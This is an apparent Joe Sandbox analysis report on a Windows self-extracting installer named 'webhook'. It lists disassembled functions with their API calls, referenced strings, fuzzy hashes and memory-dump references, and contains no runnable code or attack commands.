Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Window$DialogItem$DesktopEnableLoadMessageSendStringText
String ID: $C:\Users\user\AppData\Local\Temp\IXP000.TMP\
API String ID: 3530494346-2931560057
Opcode ID: dbd1a73f92a2ede6a0db1f7413e4fbcd9cca187b76dce4bf4ac4b133ae738712
Instruction ID: bd0babafe736df0b9c4de0b6f50dbee3872564fb5ed43516f5e3bbf56b957f80
Opcode Fuzzy Hash: dbd1a73f92a2ede6a0db1f7413e4fbcd9cca187b76dce4bf4ac4b133ae738712
Instruction Fuzzy Hash: 27717F71E08647BAF7608B32A7053F97A91EF85B90F5C8134CA8EA2795DF3CE5658700

Function 00007FF650542590 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 69librarymemoryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF6505425CD
GetProcAddress.KERNEL32 ref: 00007FF6505425EF
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF65054263C
FreeSid.ADVAPI32 ref: 00007FF65054266E
FreeLibrary.KERNEL32 ref: 00007FF65054267D

Strings

CheckTokenMembership, xrefs: 00007FF6505425E5
advapi32.dll, xrefs: 00007FF6505425C0

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: FreeLibrary$AddressAllocateInitializeLoadProc
String ID: CheckTokenMembership$advapi32.dll
API String ID: 4204503880-1888249752
Opcode ID: e160c6785fde90a48b04fb9c74fff3393dcd095ced99b921061e37aaea61ca71
Instruction ID: ba2e6ab6e870ff84be919f0dda8378054b42bc6b17054a2148250778904e996b
Opcode Fuzzy Hash: e160c6785fde90a48b04fb9c74fff3393dcd095ced99b921061e37aaea61ca71
Instruction Fuzzy Hash: 1F314136608B46AAD750CF16F4441EABBA0FB89B90F495135EE8D93714DF3CE455CB00

Function 00007FF6505433BC Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 64shutdownCOMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,00000000,00007FF6505480FA), ref: 00007FF6505433D1
OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,00000000,00007FF6505480FA), ref: 00007FF6505433EA
LookupPrivilegeValueA.ADVAPI32 ref: 00007FF65054342B
AdjustTokenPrivileges.ADVAPI32 ref: 00007FF650543462
CloseHandle.KERNEL32 ref: 00007FF650543475
ExitWindowsEx.USER32 ref: 00007FF6505434A1

Strings

SeShutdownPrivilege, xrefs: 00007FF650543424

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: ProcessToken$AdjustCloseCurrentExitHandleLookupOpenPrivilegePrivilegesValueWindows
String ID: SeShutdownPrivilege
API String ID: 2829607268-3733053543
Opcode ID: 68f57858d0a37f1d9b97d15ccc180e4361d8fc185c2eeebe84e4efed2f4b6a83
Instruction ID: cefcded75c1eb5cac22d8cbacd43070ceb160832f2a9784e645eafac4d947825
Opcode Fuzzy Hash: 68f57858d0a37f1d9b97d15ccc180e4361d8fc185c2eeebe84e4efed2f4b6a83
Instruction Fuzzy Hash: 8B219372A18643A3FB608B20E5497FABA60FB89745F589135DB8E93B54DF3CD055CB00

Function 00007FF6505418E4 Relevance: 9.0, APIs: 6, Instructions: 49timethreadCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32 ref: 00007FF650541914
GetCurrentProcessId.KERNEL32 ref: 00007FF650541922
GetCurrentThreadId.KERNEL32 ref: 00007FF65054192E
GetTickCount.KERNEL32 ref: 00007FF65054193A
GetTickCount.KERNEL32 ref: 00007FF65054194A
QueryPerformanceCounter.KERNEL32 ref: 00007FF650541965

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CountCurrentTickTime$CounterFilePerformanceProcessQuerySystemThread
String ID:
API String ID: 4104442557-0
Opcode ID: a1a8c30bc5a850f7df6bb2e960b2db2709fe8c778fbb0e1b446c87b4c6fef4b3
Instruction ID: 842d9c29c93abc4c6648e11ffba5e5dedc97f1c6bcf5abafe0056c5b1ca4a7dc
Opcode Fuzzy Hash: a1a8c30bc5a850f7df6bb2e960b2db2709fe8c778fbb0e1b446c87b4c6fef4b3
Instruction Fuzzy Hash: E1115E26A04B42AAEF10DF71ED452E833A4FB48758F480A30EAAD87754EF7CD5A58340

Function 00007FF65054170E Relevance: 1.5, APIs: 1, Instructions: 7COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32 ref: 00007FF65054171B

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: 33b5d242f9dae548e22f746f2c14e26181d9d5e8b558b2e26dfd9b2729eaeda7
Instruction ID: 9febc9fd4651845afbbad9fcf54793e4123ba389db26f8f82954a5cd1d8f2d9f
Opcode Fuzzy Hash: 33b5d242f9dae548e22f746f2c14e26181d9d5e8b558b2e26dfd9b2729eaeda7
Instruction Fuzzy Hash: 48B09B466175C351D60557B54E4508515401B4653078C1954C754C2B50DD5CD16A4614

Function 00007FF650546768 Relevance: 23.2, APIs: 10, Strings: 3, Instructions: 477COMMON

Download Yara Rule

APIs

CharNextA.USER32 ref: 00007FF6505467E7
GetModuleFileNameA.KERNEL32 ref: 00007FF6505468BB
CharUpperA.USER32 ref: 00007FF6505468FE
CharUpperA.USER32 ref: 00007FF650546994
CompareStringA.KERNEL32 ref: 00007FF650546A28
CharUpperA.USER32 ref: 00007FF650546A63
CharUpperA.USER32 ref: 00007FF650546ABF
CharUpperA.USER32 ref: 00007FF650546B5C

Part of subcall function 00007FF6505489BC: IsDBCSLeadByte.KERNEL32 ref: 00007FF6505489E1
Part of subcall function 00007FF6505489BC: CharNextA.USER32 ref: 00007FF6505489F9

CloseHandle.KERNEL32 ref: 00007FF650546D89
ExitProcess.KERNEL32 ref: 00007FF650546D97

Strings

RegServer, xrefs: 00007FF650546A19
:, xrefs: 00007FF650546B03
", xrefs: 00007FF65054684E

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Char$Upper$Next$ByteCloseCompareExitFileHandleLeadModuleNameProcessString
String ID: "$:$RegServer
API String ID: 23972181-766454958
Opcode ID: 30a90c34f7cbb46e34736c76c13f057931b7289761545bddfdfb8314716cf64c
Instruction ID: f128cf94d0434619c8781452b7f1a40d90f19ed069e1ca401e9f38c21235a1d2
Opcode Fuzzy Hash: 30a90c34f7cbb46e34736c76c13f057931b7289761545bddfdfb8314716cf64c
Instruction Fuzzy Hash: E6120021E0C683B1FF648B24A6543F92BA1AF41794F5C4135C9DEA6799CE3DE839C702

Function 00007FF65054499E Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 120threadwindowCOMMON

Download Yara Rule

APIs

TerminateThread.KERNEL32 ref: 00007FF6505449F4
ResetEvent.KERNEL32 ref: 00007FF650544A1C
SetEvent.KERNEL32 ref: 00007FF650544A63
GetDesktopWindow.USER32 ref: 00007FF650544AA8
GetDlgItem.USER32 ref: 00007FF650544AD2
SendMessageA.USER32 ref: 00007FF650544AEF
GetDlgItem.USER32 ref: 00007FF650544B00
SendMessageA.USER32 ref: 00007FF650544B1F
SetWindowTextA.USER32 ref: 00007FF650544B35
CreateThread.KERNEL32 ref: 00007FF650544B60
EndDialog.USER32 ref: 00007FF650544BAA

Strings

, xrefs: 00007FF650544A46

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: EventItemMessageSendThreadWindow$CreateDesktopDialogResetTerminateText
String ID:
API String ID: 2654313074-3916222277
Opcode ID: 161ecbf182c25f1165986d72c8c0059cd173de4edb9b55fbd2b049afc53b66ca
Instruction ID: fb52c7fa28681e0dbfd8a15b63335a1217b11b568b84f0820bbabdfcfe42e369
Opcode Fuzzy Hash: 161ecbf182c25f1165986d72c8c0059cd173de4edb9b55fbd2b049afc53b66ca
Instruction Fuzzy Hash: 1A51A431D08643B6EB518B11EA452F96AA1FF89B51F1C8231C99EA3B94DF3CD465CB00

Function 00007FF650543950 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 141libraryloaderCOMMON

Download Yara Rule

APIs

LoadLibraryA.KERNEL32 ref: 00007FF65054397A
GetProcAddress.KERNEL32 ref: 00007FF65054399E
GetProcAddress.KERNEL32 ref: 00007FF6505439BE
GetProcAddress.KERNEL32 ref: 00007FF6505439E5
GetTempPathA.KERNEL32 ref: 00007FF650543A16
CharPrevA.USER32 ref: 00007FF650543A34
CharPrevA.USER32 ref: 00007FF650543A4E
FreeLibrary.KERNEL32 ref: 00007FF650543B30
FreeLibrary.KERNEL32 ref: 00007FF650543B4C

Strings

SHGetPathFromIDList, xrefs: 00007FF6505439DB
SHBrowseForFolder, xrefs: 00007FF650543994
SHELL32.DLL, xrefs: 00007FF650543973

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: AddressLibraryProc$CharFreePrev$LoadPathTemp
String ID: SHBrowseForFolder$SHELL32.DLL$SHGetPathFromIDList
API String ID: 1865808269-1731843650
Opcode ID: a68a2c2134a308fc5224faae6e68b9a8e707b355ac96a450fb768dad26968aab
Instruction ID: b57c088539f23ca5f7022d9c2b72674d2e64524a2a1cafb9bc8a7650c3b04e28
Opcode Fuzzy Hash: a68a2c2134a308fc5224faae6e68b9a8e707b355ac96a450fb768dad26968aab
Instruction Fuzzy Hash: 4F516132A09B83B6EB518B11AA101F97BA0FB89B90F4D4275CADD977A0DF3CE455C700

Function 00007FF650542D34 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 149registryCOMMON

Download Yara Rule

APIs

CharUpperA.USER32 ref: 00007FF650542D7A
CharNextA.USER32 ref: 00007FF650542D8C
CharNextA.USER32 ref: 00007FF650542D9B
GetWindowsDirectoryA.KERNEL32 ref: 00007FF650542DC4
GetSystemDirectoryA.KERNEL32 ref: 00007FF650542DDD
RegOpenKeyExA.ADVAPI32 ref: 00007FF650542E6C
RegQueryValueExA.ADVAPI32 ref: 00007FF650542EA3
ExpandEnvironmentStringsA.KERNEL32 ref: 00007FF650542ECA
RegCloseKey.ADVAPI32 ref: 00007FF650542F2B
GetSystemDirectoryA.KERNEL32 ref: 00007FF650542F42

Strings

Software\Microsoft\Windows\CurrentVersion\App Paths, xrefs: 00007FF650542DEE

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CharDirectory$NextSystem$CloseEnvironmentExpandOpenQueryStringsUpperValueWindows
String ID: Software\Microsoft\Windows\CurrentVersion\App Paths
API String ID: 229715263-2428544900
Opcode ID: 1142a4cd6e006e845246af9bdb5df0897ae5876e42b73e5154f1751647277efe
Instruction ID: c4c4802ce5989c85ddbfc1630ddfc3220736666dd722a8ab21a2fad17e620f44
Opcode Fuzzy Hash: 1142a4cd6e006e845246af9bdb5df0897ae5876e42b73e5154f1751647277efe
Instruction Fuzzy Hash: F6518272618A93B6EB118F10E5452F97BA0FB8AB90FD85131DA8E93794DF3CD459C700

Function 00007FF650543118 Relevance: 16.6, APIs: 11, Instructions: 125memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF650542590: LoadLibraryA.KERNEL32 ref: 00007FF6505425CD
Part of subcall function 00007FF650542590: GetProcAddress.KERNEL32 ref: 00007FF6505425EF
Part of subcall function 00007FF650542590: AllocateAndInitializeSid.ADVAPI32 ref: 00007FF65054263C
Part of subcall function 00007FF650542590: FreeSid.ADVAPI32 ref: 00007FF65054266E
Part of subcall function 00007FF650542590: FreeLibrary.KERNEL32 ref: 00007FF65054267D

GetCurrentProcess.KERNEL32 ref: 00007FF650543179
OpenProcessToken.ADVAPI32 ref: 00007FF65054318F
GetTokenInformation.ADVAPI32 ref: 00007FF6505431B8
GetLastError.KERNEL32 ref: 00007FF6505431CC
LocalAlloc.KERNEL32 ref: 00007FF6505431E6
GetTokenInformation.ADVAPI32 ref: 00007FF650543214
AllocateAndInitializeSid.ADVAPI32 ref: 00007FF650543261
EqualSid.ADVAPI32 ref: 00007FF65054328C
FreeSid.ADVAPI32 ref: 00007FF6505432B1
LocalFree.KERNEL32 ref: 00007FF6505432C0
CloseHandle.KERNEL32 ref: 00007FF6505432D0

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Free$Token$AllocateInformationInitializeLibraryLocalProcess$AddressAllocCloseCurrentEqualErrorHandleLastLoadOpenProc
String ID:
API String ID: 2168512254-0
Opcode ID: 5aa378a5a02dea733385acf5e55f93e1415a95ae54cf52c9b480b087f5f96856
Instruction ID: 5de7b15dde90c6ac66338acc963ba00f2d6ada8b50405d96faa1a94cd99881cb
Opcode Fuzzy Hash: 5aa378a5a02dea733385acf5e55f93e1415a95ae54cf52c9b480b087f5f96856
Instruction Fuzzy Hash: 60514036608B43EBE7208F21E5541E97BA4FB8DB94F495135DA8EA3764DF38D464CB00

Function 00007FF6505461E8 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 180memorywindowCOMMON

Download Yara Rule

APIs

LoadStringA.USER32 ref: 00007FF650546278
LocalAlloc.KERNEL32 ref: 00007FF650546379
LocalAlloc.KERNEL32 ref: 00007FF6505463AD
MessageBoxA.USER32 ref: 00007FF6505462B8

Part of subcall function 00007FF650548AE4: EnumResourceLanguagesA.KERNEL32 ref: 00007FF650548B3C
Part of subcall function 00007FF650548AE4: EnumResourceLanguagesA.KERNEL32 ref: 00007FF650548B7A

LocalAlloc.KERNEL32 ref: 00007FF650546314
MessageBeep.USER32 ref: 00007FF650546419
MessageBoxA.USER32 ref: 00007FF65054645E
LocalFree.KERNEL32 ref: 00007FF65054646F

Part of subcall function 00007FF650548BB4: GetVersionExA.KERNEL32 ref: 00007FF650548C09
Part of subcall function 00007FF650548BB4: GetSystemMetrics.USER32 ref: 00007FF650548C43
Part of subcall function 00007FF650548BB4: RegOpenKeyExA.ADVAPI32 ref: 00007FF650548C78
Part of subcall function 00007FF650548BB4: RegQueryValueExA.ADVAPI32 ref: 00007FF650548CB3
Part of subcall function 00007FF650548BB4: RegCloseKey.ADVAPI32 ref: 00007FF650548CC6
Part of subcall function 00007FF650548BB4: CharNextA.USER32 ref: 00007FF650548D15

Strings

rce., xrefs: 00007FF650546224

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Local$AllocMessage$EnumLanguagesResource$BeepCharCloseFreeLoadMetricsNextOpenQueryStringSystemValueVersion
String ID: rce.
API String ID: 2929476258-1858031711
Opcode ID: 3ed11fbad5beae089dae1fca1131bae79aefec419c72aa5072dd9cc5e96e98b3
Instruction ID: 85e16d4326c93330cae0b0dc09d82498ac19c1aa148412a50ed45e175d2377cd
Opcode Fuzzy Hash: 3ed11fbad5beae089dae1fca1131bae79aefec419c72aa5072dd9cc5e96e98b3
Instruction Fuzzy Hash: 5F71BF21E087C3B6FA518B25A6003F96A90AF55B94F1C4231DE8DA77D5EF3CE85A8301

Function 00007FF65054604E Relevance: 13.6, APIs: 9, Instructions: 69windowCOMMON

Download Yara Rule

APIs

EndDialog.USER32 ref: 00007FF650546090
GetDesktopWindow.USER32 ref: 00007FF6505460A1
SetDlgItemTextA.USER32 ref: 00007FF6505460C7
SetWindowTextA.USER32 ref: 00007FF6505460DD
SetForegroundWindow.USER32 ref: 00007FF6505460EC
GetDlgItem.USER32 ref: 00007FF650546100
GetWindowLongPtrA.USER32 ref: 00007FF650546117
SetWindowLongPtrA.USER32 ref: 00007FF650546139
SendDlgItemMessageA.USER32 ref: 00007FF65054616A

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Window$Item$LongText$DesktopDialogForegroundMessageSend
String ID:
API String ID: 3785188418-0
Opcode ID: b99bfbc71c6e47e8d2dd802e5a3d49e478e887f1f55d0a3e4aad63706f5b073e
Instruction ID: 5621ec8d5bcea4ba609926093deb310289a3e181c26d01075e154fed550ac5ae
Opcode Fuzzy Hash: b99bfbc71c6e47e8d2dd802e5a3d49e478e887f1f55d0a3e4aad63706f5b073e
Instruction Fuzzy Hash: BC315234908643B6EA518B20EA053F47B61FF8AB61F5C9230C99EA7395DF3CE469C701

Function 00007FF650548BB4 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 109registryCOMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32 ref: 00007FF650548C09
GetSystemMetrics.USER32 ref: 00007FF650548C43
RegOpenKeyExA.ADVAPI32 ref: 00007FF650548C78
RegQueryValueExA.ADVAPI32 ref: 00007FF650548CB3
RegCloseKey.ADVAPI32 ref: 00007FF650548CC6
CharNextA.USER32 ref: 00007FF650548D15

Strings

Control Panel\Desktop\ResourceLocale, xrefs: 00007FF650548C6A

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: CharCloseMetricsNextOpenQuerySystemValueVersion
String ID: Control Panel\Desktop\ResourceLocale
API String ID: 3346862599-1109908249
Opcode ID: 79618cbf566f24ba719aea2154ce45ce3ef321f6ac2e06029fa2153c5c1a82fb
Instruction ID: 5471c6e61e07b838ed3de230d9c1515a5c4545d84468cebfe7a0f93a12ee6838
Opcode Fuzzy Hash: 79618cbf566f24ba719aea2154ce45ce3ef321f6ac2e06029fa2153c5c1a82fb
Instruction Fuzzy Hash: 1B51A236E09683BAEB508B20E9401FD77A1FB99B50F484231DA9EA7794DF3CE514CB00

Function 00007FF650542A10 Relevance: 12.2, APIs: 8, Instructions: 175COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32 ref: 00007FF650542A62
IsDBCSLeadByte.KERNEL32 ref: 00007FF650542A7E
CharNextA.USER32 ref: 00007FF650542AA4
CharUpperA.USER32 ref: 00007FF650542AB7
CharPrevA.USER32 ref: 00007FF650542AF3
CharUpperA.USER32 ref: 00007FF650542B99
CharNextA.USER32 ref: 00007FF650542C3E
CharNextA.USER32 ref: 00007FF650542C50

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Char$Next$Upper$ByteFileLeadModuleNamePrev
String ID:
API String ID: 975904313-0
Opcode ID: aa7ba7297077793f7d626753686711e9c4ffdaff21383c5eed26811cbffd48fb
Instruction ID: 3603c1e3a77ccaa2ffd4953ca9e5350bb37c9589735c6fc816598ab935a141d5
Opcode Fuzzy Hash: aa7ba7297077793f7d626753686711e9c4ffdaff21383c5eed26811cbffd48fb
Instruction Fuzzy Hash: F3719F61A0D69775FF628F2596503FC6B90AF4AB90FCC8170CADE97781CE2CE4258711

Function 00007FF6505422F0 Relevance: 12.2, APIs: 8, Instructions: 162memoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32 ref: 00007FF65054251A

Part of subcall function 00007FF650542D34: CharUpperA.USER32 ref: 00007FF650542D7A
Part of subcall function 00007FF650542D34: CharNextA.USER32 ref: 00007FF650542D8C
Part of subcall function 00007FF650542D34: CharNextA.USER32 ref: 00007FF650542D9B
Part of subcall function 00007FF650542D34: GetWindowsDirectoryA.KERNEL32 ref: 00007FF650542DC4

GetFileVersionInfoSizeA.VERSION ref: 00007FF650542367
GlobalAlloc.KERNEL32 ref: 00007FF650542386
GlobalLock.KERNEL32 ref: 00007FF6505423A1
GetFileVersionInfoA.VERSION ref: 00007FF6505423C9
VerQueryValueA.VERSION ref: 00007FF6505423EF
GlobalUnlock.KERNEL32 ref: 00007FF650542499
GlobalUnlock.KERNEL32 ref: 00007FF6505424B4

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800880533.00007FF65054E000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_7ff650540000_webhook.jbxd

Similarity

API ID: Global$Char$FileInfoNextUnlockVersion$AllocDirectoryFreeLockQuerySizeUpperValueWindows
String ID:
API String ID: 2920131565-0
Opcode ID: e2c6928dca72d3c9787df6f30925460e70e82d21755a383799fca88f808043d4
Instruction ID: 01fdb8975077355444dabcae4103220586ee9bd621cf9b9ae05ae0a12ea3ddc5
Opcode Fuzzy Hash: e2c6928dca72d3c9787df6f30925460e70e82d21755a383799fca88f808043d4
Instruction Fuzzy Hash: 07618E72A08663BAEB108F1596445FC3BA1FB44794FD88431DE8DA3794DF38E8A1CB00

Function 00007FF650543C8C Relevance: 10.6, APIs: 7, Instructions: 100COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65054375F), ref: 00007FF650543CBF
GetWindowRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,00007FF65054375F), ref: 00007FF650543CE0
GetDC.USER32 ref: 00007FF650543CFD
GetDeviceCaps.GDI32 ref: 00007FF650543D14
GetDeviceCaps.GDI32 ref: 00007FF650543D2B
ReleaseDC.USER32 ref: 00007FF650543D44
SetWindowPos.USER32 ref: 00007FF650543DB6

Memory Dump Source

Source File: 00000000.00000002.1800842992.00007FF650541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF650540000, based on PE: true

Associated: 00000000.00000002.1800826480.00007FF650540000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800857104.00007FF650549000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1800869131.00007FF65054C000.00000004.00000001.01000000.00000003.sdmpDownload File
